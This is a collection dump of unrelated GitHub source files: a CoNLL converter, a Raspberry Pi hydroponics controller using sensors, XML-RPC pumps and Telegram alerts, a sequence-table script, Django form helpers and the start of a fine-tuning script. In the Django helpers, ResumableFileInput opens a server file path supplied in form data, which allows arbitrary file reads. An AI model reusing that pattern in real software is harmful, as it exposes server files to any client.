return result, pedals\n \n\n","repo_name":"Yujia-Yan/Skipping-The-Frame-Level","sub_path":"transkun/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"68"} +{"seq_id":"20837777428","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport codecs\r\nimport sys\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser('convert conll file to input format')\r\n parser.add_argument(\"--input\", help=\"path to input file\", default=\"\")\r\n parser.add_argument(\"--output\", help=\"path to output file\", default=\"\")\r\n args = parser.parse_args()\r\n\r\n if args.input == \"\":\r\n print(\"input file needed\", file=sys.stderr)\r\n sys.exit(1)\r\n if args.output == \"\":\r\n print(\"output file needed\", file=sys.stderr)\r\n sys.exit(1)\r\n if args.input == args.output:\r\n print(\"input and output cannot be the same\", file=sys.stderr)\r\n sys.exit(1)\r\n\r\n output_file = codecs.open(args.output, \"w\", encoding='utf-8')\r\n\r\n try:\r\n sent = []\r\n for line in codecs.open(args.input, \"r\", encoding='utf-8'):\r\n line = line.strip()\r\n if len(line) == 0:\r\n print(u' '.join(u'{0}_{1}'.format(word, postag) for word, postag in sent), file=output_file)\r\n sent = []\r\n else:\r\n fields = line.split()\r\n word, postag = fields[1], fields[3]\r\n sent.append((word, postag))\r\n if len(sent) > 0:\r\n print(u' '.join(u'{0}_{1}'.format(word, postag) for word, postag in sent), file=output_file)\r\n finally:\r\n output_file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Oneplus/segerrparsing","sub_path":"src/conll_to_posdat.py","file_name":"conll_to_posdat.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"14761314907","text":"import xmlrpc.client\r\nimport time\r\nimport datetime\r\nimport threading\r\nimport prctl\r\nimport serial\r\nimport schedule\r\nimport sys\r\nimport logging\r\nfrom systemd.journal import JournalHandler\r\nimport urllib3\r\nfrom subprocess import PIPE, Popen\r\nimport telegram\r\nimport board\r\nimport busio\r\nfrom adafruit_htu21d import HTU21D\r\nimport configparser\r\n\r\nfrom bme280 import BME280\r\nfrom ltr559 import LTR559\r\n\r\nimport sqlite3\r\n\r\n\r\nfrom PIL import Image, ImageFont, ImageDraw\r\nimport ST7735 as ST7735\r\nfrom fonts.ttf import Roboto as UserFont\r\n\r\n# Create ST7735 LCD display class.\r\ndisp = ST7735.ST7735 (\r\n port=0,\r\n cs=1,\r\n dc=9,\r\n backlight=12,\r\n rotation=270,\r\n spi_speed_hz=1000000\r\n)\r\n\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read ('SpaceVegetablesClient.ini')\r\n\r\n\r\n\"\"\" Remove text is draw a rectangle\r\n where text is written\r\n 0 = temperature\r\n 1 = humidity\r\n 2 = ph\r\n 3 = tds\r\n\"\"\"\r\ndef removeText():\r\n rectElements = [17, 32, 47, 63]\r\n del_rectangle = 40\r\n\r\n for i in range(4):\r\n # draw the rectangle in all elements\r\n draw.rectangle ((118, rectElements[i], 118 + del_rectangle, rectElements[i] + 15), (255, 182, 141))\r\n\r\n # draw.rectangle ((118, rectElements[element], 118 + del_rectangle, rectElements[element] + 15), (255, 182, 141))\r\n return 0\r\n\r\n\"\"\" Write text to the LCD \"\"\"\r\n\r\ndef writeText (elements):\r\n disp.set_backlight(1)\r\n rectElements = [17, 32, 47, 63]\r\n for i in range(4):\r\n draw.text((118,rectElements[i]), elements[i], 
font=font, fill=(255, 255, 255))\r\n\r\n disp.display(image)\r\n time.sleep(300)\r\n disp.set_backlight(0)\r\n return 0\r\n\r\n\r\n\"\"\" Thread wrapper for the writeText function above;\r\n only writeText needs a thread.\r\n removeText is called beforehand to erase any previous values\r\n\"\"\"\r\ndef tWriteText(elements):\r\n log.info(\"Thread to write text\")\r\n twt = threading.Thread(target = writeText, args=(elements,))\r\n twt.setName ('Write text')\r\n twt.start()\r\n\r\nfont_size = 13\r\nfont = ImageFont.truetype(UserFont, font_size)\r\n\r\n# Initialise display.\r\ndisp.begin()\r\n\r\nimage = Image.open(config['default']['backgroundImage'])\r\ndraw = ImageDraw.Draw(image)\r\ndisp.display(image)\r\n\r\n\r\n# constants\r\n# ThingSpeak\r\nTSUrl = config['thingspeak']['url']\r\n\r\n# temperature/humidity/pressure - enviro\r\nbme280 = BME280()\r\n\r\n# temperature/humidity HTU21\r\ni2c = busio.I2C (board.SCL, board.SDA)\r\nsensorhtu21d = HTU21D(i2c)\r\n\r\n# sleep time is in seconds\r\n# multiply per 60 for minutes\r\n# airPumpTimeOn = 60 * 15 # 15 minutes\r\n#waterPumpTimeOn = 60 * 20 # 20 minutes \r\n# lightsTimeOn = 60 * 60 * 10 # 10 hour\r\n\r\nairPumpTimeOn = int(config['default']['airpumptimeon']) * 60 # 15 minutes\r\nwaterPumpTimeOn = int(config['default']['waterpumptimeon']) * 60 # 20 minutes \r\nlightsTimeOn = int(config['default']['lightstimeon']) * 60 * 60 # 10 hour\r\n\r\n# Server_IP_address = \"192.168.2.77\"\r\nServer_IP_address = config['default']['serverIpAddress']\r\n\r\n# Telegram token\r\ntoken = config['telegram']['telegramToken']\r\nchatId = config['telegram']['chatId']\r\n\r\n\"\"\" This function sends a message to Telegram \"\"\"\r\n\"\"\" Going to use it only for the main functions \"\"\"\r\ndef sendMessageTelegram (msg, \r\n chat_id = chatId,\r\n token = token):\r\n msg = \"EnviroPI: \" + msg\r\n bot = telegram.Bot(token=token)\r\n try:\r\n bot.sendMessage(chat_id=chat_id, text=msg)\r\n except telegram.error.NetworkError:\r\n # If there's some problem, handling the exception\r\n # so the SpaceVegetablesClient will not exit with an error\r\n # If cannot reach telegram or internet, just continue\r\n pass\r\n\r\n\r\n\"\"\" Read TDS values from Arduino Pro Micro \"\"\"\r\ndef getTDS():\r\n ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\r\n readtds = ser.readline().decode('utf-8').rstrip()\r\n return (readtds)\r\n\r\n\"\"\" LOGGING \"\"\"\r\nlog = logging.getLogger('SpaceVegetablesClient')\r\nlog_fmt = logging.Formatter(\"%(levelname)s %(message)s\")\r\nlog_ch = JournalHandler()\r\nlog_ch.setFormatter(log_fmt)\r\nlog.addHandler(log_ch)\r\nlog.setLevel(logging.DEBUG)\r\n\r\n\r\n\"\"\" Functions definitions \"\"\"\r\n\r\n\"\"\" DATABASE FUNCTIONS \"\"\"\r\n\"\"\" This will get environmental conditions\r\n and populate the database with those conditions\r\n\"\"\"\r\nbme280 = BME280()\r\nltr559 = LTR559()\r\n\r\ndef sendToThingSpeak (url):\r\n log.info (\"Updating ThingSpeak\")\r\n toUpdate = TSUrl + url\r\n f = urllib3.PoolManager()\r\n response = f.request('GET',toUpdate)\r\n\r\n\r\ndef get_cpu_temperature():\r\n process = Popen(['/usr/bin/vcgencmd', 'measure_temp'], stdout=PIPE, universal_newlines=True)\r\n output, _error = process.communicate()\r\n return float(output[output.index('=') + 1:output.rindex(\"'\")])\r\n\r\ndef environmentalConditions(conn):\r\n print(\"Getting environmental data\")\r\n log.info(\"Getting environmental data\")\r\n # get data\r\n #temperature = round(bme280.get_temperature(),1)\r\n humidity = round(bme280.get_humidity(),1)\r\n pressure = round(bme280.get_pressure(),1)\r\n lux = round(ltr559.get_lux(),1)\r\n\r\n\r\n #smooth cpu temperature\r\n cpu_temps = [get_cpu_temperature()] * 5\r\n\r\n factor = 7.00\r\n\r\n cpu_temp = get_cpu_temperature()\r\n cpu_temps = cpu_temps[1:] + [cpu_temp]\r\n avg_cpu_temp = sum(cpu_temps) / float (len(cpu_temps))\r\n raw_temp = bme280.get_temperature()\r\n\r\n temperature = round(raw_temp - ((avg_cpu_temp - raw_temp) / factor),1)\r\n\r\n\r\n humidityInside = round(sensorhtu21d.relative_humidity,1)\r\n temperatureInside = round(sensorhtu21d.temperature,1)\r\n \r\n #get TDS\r\n tds = getTDS()\r\n \r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n\r\n log.info(\"Populating database with environmental data\")\r\n curs.execute (\"\"\" insert into Vegetables (TDS,temperature,humidity,pressure,lightSensor,temperatureInside,humidityInside,dateTime) values ((?),(?),(?),(?),(?),(?),(?),(?)) \"\"\", (tds, temperature, humidity, pressure, lux, temperatureInside, humidityInside,dtdb))\r\n conn.commit()\r\n\r\n # Send to thingspeak\r\n log.info(\"Updating ThingSpeak\")\r\n field1 = str(temperatureInside)\r\n field2 = str(humidityInside)\r\n field3 = str(pressure)\r\n field4 = str(lux)\r\n field5 = str(tds)\r\n field6 = str(0)\r\n\r\n toUpdate = \"&field1=\" + field1 + \"&field2=\" + field2 + \"&field3=\" + field3 + \"&field4=\" + field4 + \"&field5=\" + field5 + \"&field6=\" + field6\r\n sendToThingSpeak (toUpdate)\r\n # update display\r\n # remove all from display\r\n removeText()\r\n disp.display(image)\r\n # update\r\n toOSD = [field1, field2, field6, field5]\r\n tWriteText(toOSD)\r\n\r\n\r\n\r\ndef setDBWaterPump(conn,pumpState):\r\n log.info(\"Populating water pump state into database\")\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (waterPumpActive, dateTime) values ((?), (?)) \"\"\", (pumpState, dtdb))\r\n conn.commit()\r\n\r\n toUpdate = \"&field7=\" + str(pumpState)\r\n sendToThingSpeak(toUpdate)\r\n\r\n\r\ndef setDBAirPump(conn,pumpState):\r\n log.info(\"Populating air pump state into database\")\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (airPumpActive, dateTime) values ((?), (?)) \"\"\", (pumpState, dtdb))\r\n conn.commit()\r\n\r\n toUpdate = \"&field8=\" + str(pumpState)\r\n sendToThingSpeak(toUpdate)\r\n\r\n\r\ndef setDBLights(conn,lightsState):\r\n log.info(\"Populating lights state into database\")\r\n # 0 - off\r\n # 1 - on\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (lightsActive, dateTime) values ((?), (?)) \"\"\", (lightsState, dtdb))\r\n conn.commit()\r\n\r\n\"\"\" Lights will have their own timer \"\"\"\r\n\r\n\"\"\" \r\nStart and stop Air Pump for oxygenation of water\r\n\"\"\"\r\ndef airPump(conn):\r\n prctl.set_name(\"Air Pump\")\r\n # to OSD\r\n sendMessageTelegram(\"Activating Air Pump\")\r\n log.info(\"Activating air pump into automationPI\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnAirPump(1)\r\n # set air pump db\r\n setDBAirPump(conn,1)\r\n time.sleep(airPumpTimeOn)\r\n sendMessageTelegram(\"Stopping Air Pump\")\r\n log.info(\"Deactivating air pump into automationPI\")\r\n server.turnAirPump(0)\r\n setDBAirPump(conn,0)\r\n\r\n\"\"\" \r\nStart and stop water pump for NFC\r\n\"\"\"\r\ndef waterPump(conn):\r\n # set thread name\r\n prctl.set_name(\"Water Pump\")\r\n log.info(\"Activating water pump into automationPI\")\r\n sendMessageTelegram(\"Activating Water Pump\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnWaterPump(1)\r\n setDBWaterPump(conn,1)\r\n time.sleep(waterPumpTimeOn)\r\n sendMessageTelegram(\"Stopping Water Pump\")\r\n log.info(\"Deactivating water pump into automationPI\")\r\n server.turnWaterPump(0)\r\n setDBWaterPump(conn,0)\r\n return 0\r\n\r\n\"\"\" OLD: kept from before testing succeeded\r\n with one function to control everything\r\n\"\"\"\r\n#def turnLights(conn):\r\n# prctl.set_name(\"Lights\")\r\n# log.info(\"Turning on lights into automationPI\")\r\n# sendMessageTelegram (\"Turning On Lights\")\r\n# server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n# server.turnLightsv2()\r\n# setDBLights(conn,1)\r\n\r\n\r\ndef turnLights(conn):\r\n prctl.set_name(\"Lights\")\r\n log.info(\"Turning on lights into automationPI\")\r\n sendMessageTelegram (\"Turning On Lights\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnLights(1)\r\n setDBLights(conn,1)\r\n time.sleep(lightsTimeOn)\r\n #server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n log.info(\"Turning off lights\")\r\n sendMessageTelegram(\"Turning off lights\")\r\n server.turnLights(0)\r\n setDBLights(conn,0)\r\n return 0\r\n\r\n\r\n\"\"\" The functions to spawn threads \"\"\"\r\ndef tAirPump(conn):\r\n log.info(\"Thread to air pump\")\r\n ax = threading.Thread (target = airPump, args=(conn,))\r\n ax.setName ('Air Pump')\r\n ax.start()\r\n return 0\r\n\r\ndef tWaterPump(conn):\r\n log.info(\"Thread to water pump\")\r\n aw = threading.Thread (target = waterPump,args=(conn,))\r\n aw.setName('Water Pump')\r\n aw.start()\r\n return 0\r\n\r\ndef tLights(conn):\r\n log.info(\"Thread to lights\")\r\n atl = threading.Thread (target = turnLights,args=(conn,))\r\n atl.setName('Lights')\r\n atl.start()\r\n return 0\r\n\r\n\"\"\" In case of a power outage, check if the lights should be active,\r\n because the instructions to turn the lights on\r\n come from the client - that is scheduled at 8am;\r\n if it reboots, it will schedule for next day 8am\r\n\r\n This function will run before the main function\r\n It only runs once, when the program starts,\r\n like on a reboot or startup\r\n\"\"\"\r\n\r\ndef checkActiveLights():\r\n global lightsTimeOn\r\n log.info(\"Checking if lights need to be active\")\r\n now = datetime.datetime.now().time()\r\n start8am = datetime.time(8,0,0)\r\n end18pm = datetime.time(18,0,0)\r\n if now > start8am and now < end18pm:\r\n #need to turn them on\r\n #but account for the time differences\r\n toend = datetime.datetime.combine(datetime.date.today(),end18pm)\r\n tonow = datetime.datetime.combine(datetime.date.today(),now)\r\n stilLit = toend - tonow\r\n lightsTimeOn = round(stilLit.total_seconds(),0)\r\n msg = \"Power outage. Turning lights on for: \" + str(lightsTimeOn)\r\n sendMessageTelegram (msg)\r\n log.info(msg)\r\n # call the functions to turn the lights\r\n tLights(conn)\r\n else:\r\n log.info(\"Not the correct time to activate lights\")\r\n\r\n return 0\r\n\r\n\r\n\"\"\"\r\n Resetting the light time here because,\r\n if there's a power outage, this variable gets changed\r\n to the time left until 18:00. If nothing more happens\r\n that value remains, so, next time at 0800, when the lights\r\n turn on, the last value remains and the lights turn off at that time\r\n called every day at 07:50\r\n\"\"\"\r\ndef resetLightsTime():\r\n global lightsTimeOn\r\n lightsTimeOn = 60 * 60 * 10 #10 hours\r\n return 0\r\n\r\n\r\ndef checkActiveThreads():\r\n ac = threading.activeCount()\r\n log.info (\"There are %s threads active\", str(ac))\r\n sendMessageTelegram(\"There are \" + str(ac) + \" threads active\")\r\n message = str(threading.enumerate())\r\n log.info(message)\r\n sendMessageTelegram (message)\r\n return 0\r\n\r\n#set sqlite3 connection\r\nlog.info (\"Connecting to database\")\r\nconn = sqlite3.connect(\"/home/pi/SpaceVegetablesClient/spaceVegetables.db\", check_same_thread=False)\r\n\"\"\" Scheduling \"\"\"\r\n\r\n# Schedules for water and air pump\r\n\"\"\" Turn water pump every hour for about 15m \"\"\"\r\n\"\"\" airPumpTimedOn \"\"\" \r\nlog.info(\"Scheduling air pump\")\r\nschedule.every().day.at(\"09:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"11:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"13:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"15:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"17:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"19:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"21:00\").do(tAirPump,conn)\r\n\r\n\r\n\"\"\" Schedule - for now\r\nThe more the plants grow, the more time it needs to be pumping\r\nIn the off lights period (night time), no pumping is needed\r\nSo, we're going to specify every time\r\nIt's the only way\r\nRemember to check the waterPumpTimedOn \r\n20m every 1.5 hours - for starters\r\n\"\"\"\r\nlog.info(\"Scheduling water pump\")\r\nschedule.every().day.at(\"08:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"09:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"11:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"12:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"14:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"15:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"17:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"18:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"20:00\").do(tWaterPump,conn)\r\n\r\n\r\n# Turn lights on\r\nlog.info(\"Scheduling lights on\")\r\nschedule.every().day.at(\"08:00\").do(tLights,conn)\r\n\r\n# Environmental conditions\r\nlog.info(\"Scheduling environmental conditions\")\r\nschedule.every(30).minutes.do(environmentalConditions,conn)\r\n\r\n# Scheduling reset lights time\r\nlog.info(\"Scheduling lights time reset\")\r\nschedule.every().day.at(\"07:50\").do(resetLightsTime)\r\n\r\n# threads active\r\nlog.info(\"scheduling active threads\")\r\nschedule.every(4).hours.do(checkActiveThreads)\r\n\r\n# Check if lights need to be started\r\n# power outage and this function executes just at program start\r\ncheckActiveLights()\r\n\r\nevent = threading.Event()\r\n\r\nsendMessageTelegram (\"Starting server\")\r\nwhile True:\r\n schedule.run_pending()\r\n
time.sleep(1)\r\n\r\n","repo_name":"feiticeir0/SpaceVegetables","sub_path":"SpaceVegetablesClient/SpaceVegetablesClient.py","file_name":"SpaceVegetablesClient.py","file_ext":"py","file_size_in_byte":15155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"9259336789","text":"import dinopy\nimport pandas as pd\nimport tables\nimport numpy as np\n\nf_names = []\nuniq_seqs = []\nfor i in range(len(snakemake.input)):\n seqs = dinopy.FastaReader(snakemake.input[i])\n uniq_seqs = uniq_seqs + list(set([entry.sequence.decode() for entry in seqs.entries()]))\nuniq_seqs = set(uniq_seqs)\n\n# create empty matrix and fill, all other solutions cost too much memory\nsample_names = [i.split(\"/\")[-1].split(\".\")[0] for i in snakemake.input]\ndf = pd.DataFrame(0, index=uniq_seqs, columns=sample_names, dtype=np.uint16)\n\n# fill matrix\nfor i in range(len(snakemake.input)):\n sample_name = sample_names[i]\n seqs = dinopy.FastaReader(snakemake.input[i])\n for entry in seqs.entries():\n seq = entry.sequence.decode()\n value = np.uint16(entry.name.decode().split(\"size=\")[1].split(\";\")[0])\n df.at[seq, sample_name] = value\n\n# save to file\ndf.index.name = \"sequences\"\ndf.to_hdf(snakemake.output[1], key='df', mode='w')\ndf.to_csv(snakemake.output[0])\n","repo_name":"MW55/Natrix","sub_path":"scripts/unfiltered_table.py","file_name":"unfiltered_table.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"68"} +{"seq_id":"20862891266","text":"from django.forms import ModelForm, fields\nfrom django.forms.widgets import ClearableFileInput\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.core import validators\nfrom django.utils.encoding import smart_text\n\nfrom .views import chunkUploadedFile\n\nimport re\nfrom datetime import datetime, date\n\nclass ModelFormWithMeta(ModelForm):\n def __init__(self, *args, **kwargs):\n ret = super(ModelFormWithMeta, self).__init__(*args, **kwargs)\n if self.instance:\n rel = getattr(self.instance, self.Meta.meta_set)\n extension = getattr(self.Meta, 'meta_fields_extension', ())\n extended = getattr(self.Meta, 'meta_extended_fields', {})\n for f in self.Meta.meta_fields:\n keyval = f\n value_field = self.Meta.meta_fields[f]\n values = value_field.split('.', 1)\n if len(values) == 2:\n keyval = values[0]\n value_field = values[1]\n\n args = { getattr(self.Meta, 'meta_key', 'key'): keyval }\n m = rel.filter(**args)[:1]\n if len(m) > 0:\n self.initial[f] = getattr(m[0], value_field, None)\n for e in extension:\n self.initial[f + \"__\" + e] = getattr(m[0], e, None)\n for e in extended.get(f, []):\n self.initial[extended[f][e]] = getattr(m[0], e, None)\n\n return ret\n\n def _save_meta(self):\n rel = getattr(self.instance, self.Meta.meta_set)\n extension = getattr(self.Meta, 'meta_fields_extension', ())\n extended = getattr(self.Meta, 'meta_extended_fields', {})\n for f in self.Meta.meta_fields:\n keyval = f\n value_field = self.Meta.meta_fields[f]\n values = value_field.split('.', 1)\n if len(values) == 2:\n keyval = values[0]\n value_field = values[1]\n\n meta_key = getattr(self.Meta, 'meta_key', 'key')\n m = rel.filter(**{ meta_key: keyval })[:1]\n\n # all meta attributes to be changed\n mattr = {}\n if f in self.data or self.cleaned_data.get(f):\n mattr[value_field] = self.cleaned_data[f]\n for e in extension:\n ef = f + \"__\" + e\n if ef in self.data:\n mattr[e] = self.cleaned_data[ef]\n if f in extended:\n 
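# (added note) meta_extended_fields maps a base field to extra form inputs that are\n                # saved as additional attributes on the same meta row\n                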
for e in extended[f]:\n if e in self.data:\n mattr[extended[f][e]] = self.data[e]\n\n if len(mattr) > 0:\n if len(m) == 0 and (f in self.data or self.cleaned_data.get(f)):\n # new relationship\n mattr[meta_key] = keyval\n rel.create(**mattr)\n elif len(m) > 0:\n # update existing\n for f in mattr:\n setattr(m[0], f, mattr[f])\n m[0].save()\n\n def save(self, commit=True):\n def save_meta():\n self._save_meta_m2m()\n self._save_meta()\n\n instance = super(ModelFormWithMeta, self).save(commit=commit)\n if commit:\n save_meta()\n else:\n self._save_meta_m2m = self.save_m2m\n self.save_m2m = save_meta\n return instance\n\nclass ResumableFileInput(ClearableFileInput):\n def value_from_datadict(self, data, files, name):\n upload = super(ResumableFileInput, self).value_from_datadict(data, files, name)\n if not upload:\n if name + '.path' in data and name + '.name' in data and name + '.content_type' in data and name + '.size' in data:\n try:\n f = open(data.get(name + '.path'))\n except OSError:\n pass\n else:\n upload = UploadedFile(file=f, name=data.get(name + '.name'), content_type=data.get(name + '.content_type'), size=data.get(name + '.size'))\n if not upload:\n if name + '_sessionid' in data:\n try:\n upload = chunkUploadedFile(data.get('__request'), data.get(name + '_sessionid'))\n except OSError:\n pass\n\n if upload:\n files[name] = upload\n return upload\n\nclass DateField(fields.DateField):\n def to_python(self, value):\n if value == None or value == '':\n return None\n elif type(value) in (int,float):\n return date.fromtimestamp(value)\n elif type(value) in (str,str) and re.match('^-?[0-9]+$', value):\n try:\n return date.fromtimestamp(int(value))\n except:\n pass\n if type(value) is datetime:\n return value.date()\n return super(fields.DateField, self).to_python(value)\n\nclass DateTimeField(fields.DateTimeField):\n def __init__(self, *args, **kwargs):\n ret = super(fields.DateTimeField, self).__init__(*args, **kwargs)\n \n def to_python(self, value):\n if value == None or value == '':\n return None\n elif type(value) in (int,float):\n return datetime.fromtimestamp(value)\n elif type(value) in (str,str) and re.match('^-?[0-9]+$', value):\n try:\n return datetime.fromtimestamp(int(value))\n except:\n pass\n return super(fields.DateTimeField, self).to_python(value)\n\nclass CommaSeparatedListField(fields.Field):\n def __init__(self, max_items=None, min_items=None, *args, **kwargs):\n self.max_items, self.min_items = max_items, min_items\n super(CommaSeparatedListField, self).__init__(*args, **kwargs)\n if min_items is not None:\n self.validators.append(validators.MinLengthValidator(min_items))\n if max_items is not None:\n self.validators.append(validators.MaxLengthValidator(max_items))\n \n def to_python(self, value):\n if value in validators.EMPTY_VALUES:\n return []\n \n if type(value) in (str, str):\n value = value.split(',')\n\n ret = []\n for t in value:\n t = t.strip()\n if t:\n ret.append(str(t))\n\n return ret\n","repo_name":"311labs/restit","sub_path":"rest/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6316,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"11888179637","text":"\"\"\" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa).\"\"\"\n\nimport argparse\nfrom log import logger\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.metrics import f1_score, 
recall_score, precision_score, accuracy_score\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\nfrom prior_wd_optim import PriorWD\nimport pandas as pd\nfrom transformers import (\n WEIGHTS_NAME,\n AdamW,\n AlbertConfig,\n AlbertForSequenceClassification,\n AlbertTokenizer,\n BertConfig,\n BertModel,\n BertTokenizer,\n DistilBertConfig,\n DistilBertForSequenceClassification,\n DistilBertTokenizer,\n FlaubertConfig,\n FlaubertForSequenceClassification,\n FlaubertTokenizer,\n RobertaConfig,\n RobertaTokenizer,\n XLMConfig,\n XLMForSequenceClassification,\n XLMRobertaConfig,\n XLMRobertaForSequenceClassification,\n XLMRobertaTokenizer,\n XLMTokenizer,\n XLNetConfig,\n XLNetForSequenceClassification,\n XLNetTokenizer,\n get_linear_schedule_with_warmup,\n BertForSequenceClassification\n)\nfrom models import RobertaForSequenceClassification\nfrom utils import write_to_csv, set_seed\nfrom data import convert_examples_to_features, processors, output_modes\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError:\n from tensorboardX import SummaryWriter\n\n\nMODEL_CLASSES = {\n \"bert\": (BertConfig, BertForSequenceClassification, BertTokenizer),\n \"roberta\": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)\n}\n\n\n\ndef convert_examples(args, task, tokenizer, label_list, examples):\n output_mode = output_modes[task]\n features = convert_examples_to_features(\n examples,\n tokenizer,\n label_list=label_list,\n max_length=args.max_seq_length,\n pad_on_left=bool(args.model_type in [\"xlnet\"]), # pad on the left for xlnet\n pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],\n pad_token_segment_id=4 if args.model_type in [\"xlnet\"] else 0,\n output_mode=output_mode,\n no_label=False\n )\n\n # Convert to Tensors and build dataset\n all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n all_labels = torch.tensor([f.label for f in features], dtype=torch.long)\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)\n return dataset\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_dropout\", action=\"store_true\", help=\"If specified, uses the information bottleneck to reduce\\\n the dimensions.\")\n parser.add_argument(\"--mixout\", type=float, default=0.0, help=\"mixout probability (default: 0)\")\n parser.add_argument(\n \"--prior_weight_decay\", action=\"store_true\", help=\"Weight Decaying toward the bert params\",\n )\n parser.add_argument(\"--kl_annealing\", choices=[None, \"linear\"], default=None)\n parser.add_argument(\"--evaluate_after_each_epoch\", action=\"store_true\", help=\"Eveluates the model after\\\n each epoch and saves the best model.\")\n parser.add_argument(\"--deterministic\", action=\"store_true\", help=\"If specified, learns the reduced dimensions\\\n through mlp in a deterministic manner.\")\n parser.add_argument(\"--activation\", type=str, choices=[\"tanh\", \"sigmoid\", \"relu\"], \\\n default=\"relu\")\n parser.add_argument(\"--eval_types\", nargs=\"+\", type=str, default=[\"train\", \"test\"], \\\n choices=[\"train\", \"test\", \"dev\"], help=\"Specifies the types to evaluate on,\\\n can be dev, test, 
train.\")\n parser.add_argument(\"--binarize_eval\", action=\"store_true\", help=\"If specified, binarize the predictions, and\\\n labels during the evaluations in case of binary-class datasets.\")\n # Ib parameters.\n parser.add_argument(\"--beta\", type=float, default=1.0, help=\"Defines the weight for the information bottleneck\\\n loss.\")\n parser.add_argument(\"--ib\", action=\"store_true\", help=\"If specified, uses the information bottleneck to reduce\\\n the dimensions.\")\n parser.add_argument(\"--sample_size\", type=int, default=5, help=\"Defines the number of samples for the ib method.\")\n parser.add_argument(\"--ib_dim\", default=128, type=int,\n help=\"Specifies the dimension of the information bottleneck.\")\n\n # Required parameter\n parser.add_argument(\"--output\", type=str, default=None)\n parser.add_argument(\"--eval_tasks\", nargs=\"+\", default=[], type=str, help=\"Specifies a list of evaluation tasks.\")\n parser.add_argument(\n \"--model_type\",\n default=None,\n type=str,\n required=True,\n help=\"Model type selected in the list: \" + \", \".join(MODEL_CLASSES.keys()),\n )\n parser.add_argument(\n \"--model_name_or_path\",\n default=None,\n type=str,\n required=True,\n help=\"Path to pre-trained model\",\n )\n parser.add_argument(\n \"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train selected in the list: \" + \", \".join(processors.keys()),\n )\n # Other parameters\n parser.add_argument(\n \"--config_name\", default=\"\", type=str, help=\"Pretrained config name or path if not the same as model_name\",\n )\n parser.add_argument(\n \"--tokenizer_name\",\n default=\"\",\n type=str,\n help=\"Pretrained tokenizer name or path if not the same as model_name\",\n )\n parser.add_argument(\n \"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\",\n )\n parser.add_argument(\"--do_train\", action=\"store_true\", help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\", 